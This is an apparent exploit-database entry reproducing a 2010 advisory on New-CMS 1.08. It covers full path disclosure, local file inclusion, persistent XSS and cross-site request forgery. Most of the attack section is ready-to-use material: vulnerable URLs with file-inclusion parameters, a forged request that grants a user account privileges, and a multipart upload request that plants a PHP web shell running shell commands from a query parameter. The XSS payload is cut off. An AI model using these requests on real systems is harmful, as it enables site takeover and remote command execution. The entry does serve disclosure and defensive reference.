Multiple Vulnerability in New-CMS

vendor:

New-CMS

by:

Alberto Fontanella

8,8

CVSS

HIGH

Full Path Disclosure, Local File Inclusion, Persistent XSS, XSRF

20, 22, 79, 352

CWE

Product Name: New-CMS

Affected Version From: 1.08

Affected Version To: 1.08

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu Server 9.10

2010

Multiple Vulnerability in New-CMS

Full Path Disclosure: A vulnerability in New-CMS allows an attacker to view the full path of the web application. Local File Inclusion: A vulnerability in New-CMS allows an attacker to include a local file in the web application. Persistent XSS: A vulnerability in New-CMS allows an attacker to inject malicious JavaScript code into the web application. XSRF: A vulnerability in New-CMS allows an attacker to perform certain actions on behalf of the user without their knowledge or consent.

Mitigation:

To mitigate Full Path Disclosure, ensure that the web application does not reveal the full path of the application. To mitigate Local File Inclusion, ensure that the web application does not allow the inclusion of local files. To mitigate Persistent XSS, ensure that the web application does not allow the injection of malicious JavaScript code. To mitigate XSRF, ensure that the web application does not allow unauthorized actions to be performed on behalf of the user.

Source

Exploit-DB raw data:

#
#
# Multiple Vulnerability in New-CMS
#
# [Vendor SW]: New-CMS
# [Version]: 1.08 (but possible all versions)
# [Vendor URL]: www.new-cms.org
# [Tested on]: Ubuntu Server 9.10
# [Category]: Webapps/0day
#
# [Date]: 17 Feb 2010
# [Author]: Alberto "fulgur" Fontanella
# [Author URL]: ictsec.wordpress.com
# [Author EMAIL]: itsicurezza<0x40>yahoo.it
#
#


[ 1 ] - [ Full Path Disclosure ]

http://[host]/struttura/ricerca.php
http://[host]/pdf.php
http://[host]/index.php?lng=it&pg=manager
...etc

Fatal error: Call to undefined function ListaFile() in
/var/www/struttura/ricerca.php on line 8


[ 2 ] - [ Local File Inclusion ]

http://[host]/index.php?pg=cmd

You have to put cmd.php in /struttura/

http://[host]/pdf.php?lng=cmd.php
http://[host]/newcms/struttura/manager.php?lng=cmd.php
http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php
...etc

You have to put cmd.php.str in /lingue/


[ 3 ] - [ Persistent XSS ]

Write an Article/News and Put in the Title field:

">



[ 4 ] - [ XSRF ]

To give privileges to an User Account:

POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/index.php?lng=it&pg=admin&s=redattori
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on

To upload a PHP Shell:

POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1
Host: [host]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/struttura/manager.php?lng=it&id=indirizzo_0
Content-Type: multipart/form-data;
boundary=---------------------------213917452311081853951240913053
Content-Length: 424

-----------------------------213917452311081853951240913053
Content-Disposition: form-data; name="radice"
Content-Disposition: form-data; name="per"


-----------------------------213917452311081853951240913053
Content-Disposition: form-data; name="file"; filename="cmd9.php"
Content-Type: application/x-httpd-php

<?php
system($_GET['cmd']);
?>

-----------------------------213917452311081853951240913053--